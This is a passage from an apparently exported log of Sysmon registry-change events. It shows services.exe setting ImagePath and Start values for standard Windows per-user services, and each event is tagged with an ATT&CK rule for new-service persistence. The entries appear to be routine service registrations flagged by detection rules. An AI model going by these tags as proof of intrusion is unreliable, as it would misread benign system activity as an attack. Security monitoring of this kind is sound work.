C:\\Windows\\system32\\services.exe\r\nTargetObject: HKLM\\System\\CurrentControlSet\\Services\\MessagingService_69cbe\\ImagePath\r\nDetails: C:\\Windows\\system32\\svchost.exe -k UnistackSvcGroup\""""},""eventdata"":{""ruleName"":""T1031,T1050"",""eventType"":""SetValue"",""utcTime"":""2020-04-24 13:10:50.683"",""processGuid"":""{df9fc3d3-e544-5ea2-0000-00100ca80000}"",""processId"":""584"",""image"":""C:\\\\Windows\\\\system32\\\\services.exe"",""targetObject"":""HKLM\\\\System\\\\CurrentControlSet\\\\Services\\\\MessagingService_69cbe\\\\ImagePath"",""details"":""C:\\\\Windows\\\\system32\\\\svchost.exe -k UnistackSvcGroup""}}}","""Registry value set: +RuleName: T1031,T1050 +EventType: SetValue +UtcTime: 2020-04-24 13:10:50.683 +ProcessGuid: {df9fc3d3-e544-5ea2-0000-00100ca80000} +ProcessId: 584 +Image: C:\Windows\system32\services.exe +TargetObject: HKLM\System\CurrentControlSet\Services\MessagingService_69cbe\ImagePath +Details: C:\Windows\system32\svchost.exe -k UnistackSvcGroup""" +"Apr 24, 2020 @ 13:10:56.091",9,"ATT&CK T1058:Registry edit for new service","{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""13"",""version"":""2"",""level"":""4"",""task"":""13"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-04-24T13:10:50.717109000Z"",""eventRecordID"":""3353"",""processID"":""2112"",""threadID"":""2072"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Registry value set:\r\nRuleName: T1031,T1050\r\nEventType: SetValue\r\nUtcTime: 2020-04-24 13:10:50.683\r\nProcessGuid: {df9fc3d3-e544-5ea2-0000-00100ca80000}\r\nProcessId: 584\r\nImage: C:\\Windows\\system32\\services.exe\r\nTargetObject: HKLM\\System\\CurrentControlSet\\Services\\MessagingService_69cbe\\Start\r\nDetails: DWORD (0x00000003)\""""},""eventdata"":{""ruleName"":""T1031,T1050"",""eventType"":""SetValue"",""utcTime"":""2020-04-24 13:10:50.683"",""processGuid"":""{df9fc3d3-e544-5ea2-0000-00100ca80000}"",""processId"":""584"",""image"":""C:\\\\Windows\\\\system32\\\\services.exe"",""targetObject"":""HKLM\\\\System\\\\CurrentControlSet\\\\Services\\\\MessagingService_69cbe\\\\Start"",""details"":""DWORD (0x00000003)""}}}","""Registry value set: +RuleName: T1031,T1050 +EventType: SetValue +UtcTime: 2020-04-24 13:10:50.683 +ProcessGuid: {df9fc3d3-e544-5ea2-0000-00100ca80000} +ProcessId: 584 +Image: C:\Windows\system32\services.exe +TargetObject: HKLM\System\CurrentControlSet\Services\MessagingService_69cbe\Start +Details: DWORD (0x00000003)""" +"Apr 24, 2020 @ 13:10:56.014",9,"ATT&CK T1058:Registry edit for new service","{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""13"",""version"":""2"",""level"":""4"",""task"":""13"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-04-24T13:10:50.715538200Z"",""eventRecordID"":""3352"",""processID"":""2112"",""threadID"":""2072"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Registry value set:\r\nRuleName: T1031,T1050\r\nEventType: SetValue\r\nUtcTime: 2020-04-24 13:10:50.683\r\nProcessGuid: {df9fc3d3-e544-5ea2-0000-00100ca80000}\r\nProcessId: 584\r\nImage: C:\\Windows\\system32\\services.exe\r\nTargetObject: HKLM\\System\\CurrentControlSet\\Services\\DevicesFlowUserSvc_69cbe\\ImagePath\r\nDetails: C:\\Windows\\system32\\svchost.exe -k DevicesFlow\""""},""eventdata"":{""ruleName"":""T1031,T1050"",""eventType"":""SetValue"",""utcTime"":""2020-04-24 13:10:50.683"",""processGuid"":""{df9fc3d3-e544-5ea2-0000-00100ca80000}"",""processId"":""584"",""image"":""C:\\\\Windows\\\\system32\\\\services.exe"",""targetObject"":""HKLM\\\\System\\\\CurrentControlSet\\\\Services\\\\DevicesFlowUserSvc_69cbe\\\\ImagePath"",""details"":""C:\\\\Windows\\\\system32\\\\svchost.exe -k DevicesFlow""}}}","""Registry value set: +RuleName: T1031,T1050 +EventType: SetValue +UtcTime: 2020-04-24 13:10:50.683 +ProcessGuid: {df9fc3d3-e544-5ea2-0000-00100ca80000} +ProcessId: 584 +Image: C:\Windows\system32\services.exe +TargetObject: HKLM\System\CurrentControlSet\Services\DevicesFlowUserSvc_69cbe\ImagePath +Details: C:\Windows\system32\svchost.exe -k DevicesFlow""" +"Apr 24, 2020 @ 13:10:55.969",9,"ATT&CK T1058:Registry edit for new service","{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""13"",""version"":""2"",""level"":""4"",""task"":""13"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-04-24T13:10:50.714832400Z"",""eventRecordID"":""3351"",""processID"":""2112"",""threadID"":""2072"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Registry value set:\r\nRuleName: T1031,T1050\r\nEventType: SetValue\r\nUtcTime: 2020-04-24 13:10:50.683\r\nProcessGuid: {df9fc3d3-e544-5ea2-0000-00100ca80000}\r\nProcessId: 584\r\nImage: C:\\Windows\\system32\\services.exe\r\nTargetObject: HKLM\\System\\CurrentControlSet\\Services\\DevicesFlowUserSvc_69cbe\\Start\r\nDetails: DWORD (0x00000003)\""""},""eventdata"":{""ruleName"":""T1031,T1050"",""eventType"":""SetValue"",""utcTime"":""2020-04-24 13:10:50.683"",""processGuid"":""{df9fc3d3-e544-5ea2-0000-00100ca80000}"",""processId"":""584"",""image"":""C:\\\\Windows\\\\system32\\\\services.exe"",""targetObject"":""HKLM\\\\System\\\\CurrentControlSet\\\\Services\\\\DevicesFlowUserSvc_69cbe\\\\Start"",""details"":""DWORD (0x00000003)""}}}","""Registry value set: +RuleName: T1031,T1050 +EventType: SetValue +UtcTime: 2020-04-24 13:10:50.683 +ProcessGuid: {df9fc3d3-e544-5ea2-0000-00100ca80000} +ProcessId: 584 +Image: C:\Windows\system32\services.exe +TargetObject: HKLM\System\CurrentControlSet\Services\DevicesFlowUserSvc_69cbe\Start +Details: DWORD (0x00000003)""" +"Apr 24, 2020 @ 13:10:55.926",9,"ATT&CK T1058:Registry edit for new service","{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""13"",""version"":""2"",""level"":""4"",""task"":""13"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-04-24T13:10:50.711747300Z"",""eventRecordID"":""3350"",""processID"":""2112"",""threadID"":""2072"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Registry value set:\r\nRuleName: T1031,T1050\r\nEventType: SetValue\r\nUtcTime: 2020-04-24 13:10:50.683\r\nProcessGuid: {df9fc3d3-e544-5ea2-0000-00100ca80000}\r\nProcessId: 584\r\nImage: C:\\Windows\\system32\\services.exe\r\nTargetObject: HKLM\\System\\CurrentControlSet\\Services\\DevicePickerUserSvc_69cbe\\ImagePath\r\nDetails: C:\\Windows\\system32\\svchost.exe -k DevicesFlow\""""},""eventdata"":{""ruleName"":""T1031,T1050"",""eventType"":""SetValue"",""utcTime"":""2020-04-24 13:10:50.683"",""processGuid"":""{df9fc3d3-e544-5ea2-0000-00100ca80000}"",""processId"":""584"",""image"":""C:\\\\Windows\\\\system32\\\\services.exe"",""targetObject"":""HKLM\\\\System\\\\CurrentControlSet\\\\Services\\\\DevicePickerUserSvc_69cbe\\\\ImagePath"",""details"":""C:\\\\Windows\\\\system32\\\\svchost.exe -k DevicesFlow""}}}","""Registry value set: +RuleName: T1031,T1050 +EventType: SetValue +UtcTime: 2020-04-24 13:10:50.683 +ProcessGuid: {df9fc3d3-e544-5ea2-0000-00100ca80000} +ProcessId: 584 +Image: C:\Windows\system32\services.exe +TargetObject: HKLM\System\CurrentControlSet\Services\DevicePickerUserSvc_69cbe\ImagePath +Details: C:\Windows\system32\svchost.exe -k DevicesFlow""" +"Apr 24, 2020 @ 13:10:55.865",9,"ATT&CK T1058:Registry edit for new service","{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""13"",""version"":""2"",""level"":""4"",""task"":""13"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-04-24T13:10:50.711518200Z"",""eventRecordID"":""3349"",""processID"":""2112"",""threadID"":""2072"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Registry value set:\r\nRuleName: T1031,T1050\r\nEventType: SetValue\r\nUtcTime: 2020-04-24 13:10:50.683\r\nProcessGuid: {df9fc3d3-e544-5ea2-0000-00100ca80000}\r\nProcessId: 584\r\nImage: C:\\Windows\\system32\\services.exe\r\nTargetObject: HKLM\\System\\CurrentControlSet\\Services\\DevicePickerUserSvc_69cbe\\Start\r\nDetails: DWORD (0x00000003)\""""},""eventdata"":{""ruleName"":""T1031,T1050"",""eventType"":""SetValue"",""utcTime"":""2020-04-24 13:10:50.683"",""processGuid"":""{df9fc3d3-e544-5ea2-0000-00100ca80000}"",""processId"":""584"",""image"":""C:\\\\Windows\\\\system32\\\\services.exe"",""targetObject"":""HKLM\\\\System\\\\CurrentControlSet\\\\Services\\\\DevicePickerUserSvc_69cbe\\\\Start"",""details"":""DWORD (0x00000003)""}}}","""Registry value set: +RuleName: T1031,T1050 +EventType: SetValue +UtcTime: 2020-04-24 13:10:50.683 +ProcessGuid: {df9fc3d3-e544-5ea2-0000-00100ca80000} +ProcessId: 584 +Image: C:\Windows\system32\services.exe +TargetObject: HKLM\System\CurrentControlSet\Services\DevicePickerUserSvc_69cbe\Start +Details: DWORD (0x00000003)""" +"Apr 24, 2020 @ 13:10:55.751",9,"ATT&CK T1058:Registry edit for new service","{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""13"",""version"":""2"",""level"":""4"",""task"":""13"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-04-24T13:10:50.710126100Z"",""eventRecordID"":""3348"",""processID"":""2112"",""threadID"":""2072"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Registry value set:\r\nRuleName: T1031,T1050\r\nEventType: SetValue\r\nUtcTime: 2020-04-24 13:10:50.667\r\nProcessGuid: {df9fc3d3-e544-5ea2-0000-00100ca80000}\r\nProcessId: 584\r\nImage: C:\\Windows\\system32\\services.exe\r\nTargetObject: HKLM\\System\\CurrentControlSet\\Services\\DeviceAssociationBrokerSvc_69cbe\\ImagePath\r\nDetails: C:\\Windows\\system32\\svchost.exe -k DevicesFlow -p\""""},""eventdata"":{""ruleName"":""T1031,T1050"",""eventType"":""SetValue"",""utcTime"":""2020-04-24 13:10:50.667"",""processGuid"":""{df9fc3d3-e544-5ea2-0000-00100ca80000}"",""processId"":""584"",""image"":""C:\\\\Windows\\\\system32\\\\services.exe"",""targetObject"":""HKLM\\\\System\\\\CurrentControlSet\\\\Services\\\\DeviceAssociationBrokerSvc_69cbe\\\\ImagePath"",""details"":""C:\\\\Windows\\\\system32\\\\svchost.exe -k DevicesFlow -p""}}}","""Registry value set: +RuleName: T1031,T1050 +EventType: SetValue +UtcTime: 2020-04-24 13:10:50.667 +ProcessGuid: {df9fc3d3-e544-5ea2-0000-00100ca80000} +ProcessId: 584 +Image: C:\Windows\system32\services.exe +TargetObject: HKLM\System\CurrentControlSet\Services\DeviceAssociationBrokerSvc_69cbe\ImagePath +Details: C:\Windows\system32\svchost.exe -k DevicesFlow -p""" +"Apr 24, 2020 @ 13:10:55.655",9,"ATT&CK T1058:Registry edit for new service","{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""13"",""version"":""2"",""level"":""4"",""task"":""13"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-04-24T13:10:50.709773600Z"",""eventRecordID"":""3347"",""processID"":""2112"",""threadID"":""2072"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Registry value set:\r\nRuleName: T1031,T1050\r\nEventType: SetValue\r\nUtcTime: 2020-04-24 13:10:50.667\r\nProcessGuid: {df9fc3d3-e544-5ea2-0000-00100ca80000}\r\nProcessId: 584\r\nImage: C:\\Windows\\system32\\services.exe\r\nTargetObject: HKLM\\System\\CurrentControlSet\\Services\\DeviceAssociationBrokerSvc_69cbe\\Start\r\nDetails: DWORD (0x00000003)\""""},""eventdata"":{""ruleName"":""T1031,T1050"",""eventType"":""SetValue"",""utcTime"":""2020-04-24 13:10:50.667"",""processGuid"":""{df9fc3d3-e544-5ea2-0000-00100ca80000}"",""processId"":""584"",""image"":""C:\\\\Windows\\\\system32\\\\services.exe"",""targetObject"":""HKLM\\\\System\\\\CurrentControlSet\\\\Services\\\\DeviceAssociationBrokerSvc_69cbe\\\\Start"",""details"":""DWORD (0x00000003)""}}}","""Registry value set: +RuleName: T1031,T1050 +EventType: SetValue +UtcTime: 2020-04-24 13:10:50.667 +ProcessGuid: {df9fc3d3-e544-5ea2-0000-00100ca80000} +ProcessId: 584 +Image: C:\Windows\system32\services.exe +TargetObject: HKLM\System\CurrentControlSet\Services\DeviceAssociationBrokerSvc_69cbe\Start +Details: DWORD (0x00000003)""" +"Apr 24, 2020 @ 13:10:55.577",9,"ATT&CK T1058:Registry edit for new service","{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""13"",""version"":""2"",""level"":""4"",""task"":""13"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-04-24T13:10:50.707978400Z"",""eventRecordID"":""3346"",""processID"":""2112"",""threadID"":""2072"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Registry value set:\r\nRuleName: T1031,T1050\r\nEventType: SetValue\r\nUtcTime: 2020-04-24 13:10:50.667\r\nProcessGuid: {df9fc3d3-e544-5ea2-0000-00100ca80000}\r\nProcessId: 584\r\nImage: C:\\Windows\\system32\\services.exe\r\nTargetObject: HKLM\\System\\CurrentControlSet\\Services\\CredentialEnrollmentManagerUserSvc_69cbe\\ImagePath\r\nDetails: C:\\Windows\\system32\\CredentialEnrollmentManager.exe\""""},""eventdata"":{""ruleName"":""T1031,T1050"",""eventType"":""SetValue"",""utcTime"":""2020-04-24 13:10:50.667"",""processGuid"":""{df9fc3d3-e544-5ea2-0000-00100ca80000}"",""processId"":""584"",""image"":""C:\\\\Windows\\\\system32\\\\services.exe"",""targetObject"":""HKLM\\\\System\\\\CurrentControlSet\\\\Services\\\\CredentialEnrollmentManagerUserSvc_69cbe\\\\ImagePath"",""details"":""C:\\\\Windows\\\\system32\\\\CredentialEnrollmentManager.exe""}}}","""Registry value set: +RuleName: T1031,T1050 +EventType: SetValue +UtcTime: 2020-04-24 13:10:50.667 +ProcessGuid: {df9fc3d3-e544-5ea2-0000-00100ca80000} +ProcessId: 584 +Image: C:\Windows\system32\services.exe +TargetObject: HKLM\System\CurrentControlSet\Services\CredentialEnrollmentManagerUserSvc_69cbe\ImagePath +Details: C:\Windows\system32\CredentialEnrollmentManager.exe""" +"Apr 24, 2020 @ 13:10:55.515",9,"ATT&CK T1058:Registry edit for new service","{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""13"",""version"":""2"",""level"":""4"",""task"":""13"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-04-24T13:10:50.705520500Z"",""eventRecordID"":""3345"",""processID"":""2112"",""threadID"":""2072"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Registry value set:\r\nRuleName: T1031,T1050\r\nEventType: SetValue\r\nUtcTime: 2020-04-24 13:10:50.667\r\nProcessGuid: {df9fc3d3-e544-5ea2-0000-00100ca80000}\r\nProcessId: 584\r\nImage: C:\\Windows\\system32\\services.exe\r\nTargetObject: HKLM\\System\\CurrentControlSet\\Services\\CredentialEnrollmentManagerUserSvc_69cbe\\Start\r\nDetails: DWORD (0x00000003)\""""},""eventdata"":{""ruleName"":""T1031,T1050"",""eventType"":""SetValue"",""utcTime"":""2020-04-24 13:10:50.667"",""processGuid"":""{df9fc3d3-e544-5ea2-0000-00100ca80000}"",""processId"":""584"",""image"":""C:\\\\Windows\\\\system32\\\\services.exe"",""targetObject"":""HKLM\\\\System\\\\CurrentControlSet\\\\Services\\\\CredentialEnrollmentManagerUserSvc_69cbe\\\\Start"",""details"":""DWORD (0x00000003)""}}}","""Registry value set: +RuleName: T1031,T1050 +EventType: SetValue +UtcTime: 2020-04-24 13:10:50.667 +ProcessGuid: {df9fc3d3-e544-5ea2-0000-00100ca80000} +ProcessId: 584 +Image: C:\Windows\system32\services.exe +TargetObject: HKLM\System\CurrentControlSet\Services\CredentialEnrollmentManagerUserSvc_69cbe\Start +Details: DWORD (0x00000003)""" +"Apr 24, 2020 @ 13:10:55.385",9,"ATT&CK T1058:Registry edit for new service","{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""13"",""version"":""2"",""level"":""4"",""task"":""13"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-04-24T13:10:50.704186900Z"",""eventRecordID"":""3344"",""processID"":""2112"",""threadID"":""2072"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Registry value set:\r\nRuleName: T1031,T1050\r\nEventType: SetValue\r\nUtcTime: 2020-04-24 13:10:50.667\r\nProcessGuid: {df9fc3d3-e544-5ea2-0000-00100ca80000}\r\nProcessId: 584\r\nImage: C:\\Windows\\system32\\services.exe\r\nTargetObject: HKLM\\System\\CurrentControlSet\\Services\\ConsentUxUserSvc_69cbe\\ImagePath\r\nDetails: C:\\Windows\\system32\\svchost.exe -k DevicesFlow\""""},""eventdata"":{""ruleName"":""T1031,T1050"",""eventType"":""SetValue"",""utcTime"":""2020-04-24 13:10:50.667"",""processGuid"":""{df9fc3d3-e544-5ea2-0000-00100ca80000}"",""processId"":""584"",""image"":""C:\\\\Windows\\\\system32\\\\services.exe"",""targetObject"":""HKLM\\\\System\\\\CurrentControlSet\\\\Services\\\\ConsentUxUserSvc_69cbe\\\\ImagePath"",""details"":""C:\\\\Windows\\\\system32\\\\svchost.exe -k DevicesFlow""}}}","""Registry value set: +RuleName: T1031,T1050 +EventType: SetValue +UtcTime: 2020-04-24 13:10:50.667 +ProcessGuid: {df9fc3d3-e544-5ea2-0000-00100ca80000} +ProcessId: 584 +Image: C:\Windows\system32\services.exe +TargetObject: HKLM\System\CurrentControlSet\Services\ConsentUxUserSvc_69cbe\ImagePath +Details: C:\Windows\system32\svchost.exe -k DevicesFlow""" +"Apr 24, 2020 @ 13:10:54.704",9,"ATT&CK T1058:Registry edit for new service","{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""13"",""version"":""2"",""level"":""4"",""task"":""13"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-04-24T13:10:50.703831900Z"",""eventRecordID"":""3343"",""processID"":""2112"",""threadID"":""2072"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Registry value set:\r\nRuleName: T1031,T1050\r\nEventType: SetValue\r\nUtcTime: 2020-04-24 13:10:50.667\r\nProcessGuid: {df9fc3d3-e544-5ea2-0000-00100ca80000}\r\nProcessId: 584\r\nImage: C:\\Windows\\system32\\services.exe\r\nTargetObject: HKLM\\System\\CurrentControlSet\\Services\\ConsentUxUserSvc_69cbe\\Start\r\nDetails: DWORD (0x00000003)\""""},""eventdata"":{""ruleName"":""T1031,T1050"",""eventType"":""SetValue"",""utcTime"":""2020-04-24 13:10:50.667"",""processGuid"":""{df9fc3d3-e544-5ea2-0000-00100ca80000}"",""processId"":""584"",""image"":""C:\\\\Windows\\\\system32\\\\services.exe"",""targetObject"":""HKLM\\\\System\\\\CurrentControlSet\\\\Services\\\\ConsentUxUserSvc_69cbe\\\\Start"",""details"":""DWORD (0x00000003)""}}}","""Registry value set: +RuleName: T1031,T1050 +EventType: SetValue +UtcTime: 2020-04-24 13:10:50.667 +ProcessGuid: {df9fc3d3-e544-5ea2-0000-00100ca80000} +ProcessId: 584 +Image: C:\Windows\system32\services.exe +TargetObject: HKLM\System\CurrentControlSet\Services\ConsentUxUserSvc_69cbe\Start +Details: DWORD (0x00000003)""" +"Apr 24, 2020 @ 13:10:54.546",9,"ATT&CK T1058:Registry edit for new service","{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""13"",""version"":""2"",""level"":""4"",""task"":""13"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-04-24T13:10:50.701850300Z"",""eventRecordID"":""3342"",""processID"":""2112"",""threadID"":""2072"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Registry value set:\r\nRuleName: T1031,T1050\r\nEventType: SetValue\r\nUtcTime: 2020-04-24 13:10:50.667\r\nProcessGuid: {df9fc3d3-e544-5ea2-0000-00100ca80000}\r\nProcessId: 584\r\nImage: C:\\Windows\\system32\\services.exe\r\nTargetObject: HKLM\\System\\CurrentControlSet\\Services\\CDPUserSvc_69cbe\\ImagePath\r\nDetails: C:\\Windows\\system32\\svchost.exe -k UnistackSvcGroup\""""},""eventdata"":{""ruleName"":""T1031,T1050"",""eventType"":""SetValue"",""utcTime"":""2020-04-24 13:10:50.667"",""processGuid"":""{df9fc3d3-e544-5ea2-0000-00100ca80000}"",""processId"":""584"",""image"":""C:\\\\Windows\\\\system32\\\\services.exe"",""targetObject"":""HKLM\\\\System\\\\CurrentControlSet\\\\Services\\\\CDPUserSvc_69cbe\\\\ImagePath"",""details"":""C:\\\\Windows\\\\system32\\\\svchost.exe -k UnistackSvcGroup""}}}","""Registry value set: +RuleName: T1031,T1050 +EventType: SetValue +UtcTime: 2020-04-24 13:10:50.667 +ProcessGuid: {df9fc3d3-e544-5ea2-0000-00100ca80000} +ProcessId: 584 +Image: C:\Windows\system32\services.exe +TargetObject: HKLM\System\CurrentControlSet\Services\CDPUserSvc_69cbe\ImagePath +Details: C:\Windows\system32\svchost.exe -k UnistackSvcGroup""" +"Apr 24, 2020 @ 13:10:54.426",9,"ATT&CK T1058:Registry edit for new service","{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""13"",""version"":""2"",""level"":""4"",""task"":""13"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-04-24T13:10:50.694538400Z"",""eventRecordID"":""3341"",""processID"":""2112"",""threadID"":""2072"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Registry value set:\r\nRuleName: T1031,T1050\r\nEventType: SetValue\r\nUtcTime: 2020-04-24 13:10:50.667\r\nProcessGuid: {df9fc3d3-e544-5ea2-0000-00100ca80000}\r\nProcessId: 584\r\nImage: C:\\Windows\\system32\\services.exe\r\nTargetObject: HKLM\\System\\CurrentControlSet\\Services\\CDPUserSvc_69cbe\\Start\r\nDetails: DWORD (0x00000002)\""""},""eventdata"":{""ruleName"":""T1031,T1050"",""eventType"":""SetValue"",""utcTime"":""2020-04-24 13:10:50.667"",""processGuid"":""{df9fc3d3-e544-5ea2-0000-00100ca80000}"",""processId"":""584"",""image"":""C:\\\\Windows\\\\system32\\\\services.exe"",""targetObject"":""HKLM\\\\System\\\\CurrentControlSet\\\\Services\\\\CDPUserSvc_69cbe\\\\Start"",""details"":""DWORD (0x00000002)""}}}","""Registry value set: +RuleName: T1031,T1050 +EventType: SetValue +UtcTime: 2020-04-24 13:10:50.667 +ProcessGuid: {df9fc3d3-e544-5ea2-0000-00100ca80000} +ProcessId: 584 +Image: C:\Windows\system32\services.exe +TargetObject: HKLM\System\CurrentControlSet\Services\CDPUserSvc_69cbe\Start +Details: DWORD (0x00000002)""" +"Apr 24, 2020 @ 13:10:54.387",9,"ATT&CK T1058:Registry edit for new service","{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""13"",""version"":""2"",""level"":""4"",""task"":""13"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-04-24T13:10:50.692804700Z"",""eventRecordID"":""3340"",""processID"":""2112"",""threadID"":""2072"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Registry value set:\r\nRuleName: T1031,T1050\r\nEventType: SetValue\r\nUtcTime: 2020-04-24 13:10:50.667\r\nProcessGuid: {df9fc3d3-e544-5ea2-0000-00100ca80000}\r\nProcessId: 584\r\nImage: C:\\Windows\\system32\\services.exe\r\nTargetObject: HKLM\\System\\CurrentControlSet\\Services\\cbdhsvc_69cbe\\ImagePath\r\nDetails: C:\\Windows\\system32\\svchost.exe -k ClipboardSvcGroup -p\""""},""eventdata"":{""ruleName"":""T1031,T1050"",""eventType"":""SetValue"",""utcTime"":""2020-04-24 13:10:50.667"",""processGuid"":""{df9fc3d3-e544-5ea2-0000-00100ca80000}"",""processId"":""584"",""image"":""C:\\\\Windows\\\\system32\\\\services.exe"",""targetObject"":""HKLM\\\\System\\\\CurrentControlSet\\\\Services\\\\cbdhsvc_69cbe\\\\ImagePath"",""details"":""C:\\\\Windows\\\\system32\\\\svchost.exe -k ClipboardSvcGroup -p""}}}","""Registry value set: +RuleName: T1031,T1050 +EventType: SetValue +UtcTime: 2020-04-24 13:10:50.667 +ProcessGuid: {df9fc3d3-e544-5ea2-0000-00100ca80000} +ProcessId: 584 +Image: C:\Windows\system32\services.exe +TargetObject: HKLM\System\CurrentControlSet\Services\cbdhsvc_69cbe\ImagePath +Details: C:\Windows\system32\svchost.exe -k ClipboardSvcGroup -p""" +"Apr 24, 2020 @ 13:10:54.360",9,"ATT&CK T1058:Registry edit for new service","{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""13"",""version"":""2"",""level"":""4"",""task"":""13"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-04-24T13:10:50.692362600Z"",""eventRecordID"":""3339"",""processID"":""2112"",""threadID"":""2072"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Registry value set:\r\nRuleName: T1031,T1050\r\nEventType: SetValue\r\nUtcTime: 2020-04-24 13:10:50.667\r\nProcessGuid: {df9fc3d3-e544-5ea2-0000-00100ca80000}\r\nProcessId: 584\r\nImage: C:\\Windows\\system32\\services.exe\r\nTargetObject: HKLM\\System\\CurrentControlSet\\Services\\cbdhsvc_69cbe\\Start\r\nDetails: DWORD (0x00000003)\""""},""eventdata"":{""ruleName"":""T1031,T1050"",""eventType"":""SetValue"",""utcTime"":""2020-04-24 13:10:50.667"",""processGuid"":""{df9fc3d3-e544-5ea2-0000-00100ca80000}"",""processId"":""584"",""image"":""C:\\\\Windows\\\\system32\\\\services.exe"",""targetObject"":""HKLM\\\\System\\\\CurrentControlSet\\\\Services\\\\cbdhsvc_69cbe\\\\Start"",""details"":""DWORD (0x00000003)""}}}","""Registry value set: +RuleName: T1031,T1050 +EventType: SetValue +UtcTime: 2020-04-24 13:10:50.667 +ProcessGuid: {df9fc3d3-e544-5ea2-0000-00100ca80000} +ProcessId: 584 +Image: C:\Windows\system32\services.exe +TargetObject: HKLM\System\CurrentControlSet\Services\cbdhsvc_69cbe\Start +Details: DWORD (0x00000003)""" +"Apr 24, 2020 @ 13:10:54.343",9,"ATT&CK T1058:Registry edit for new 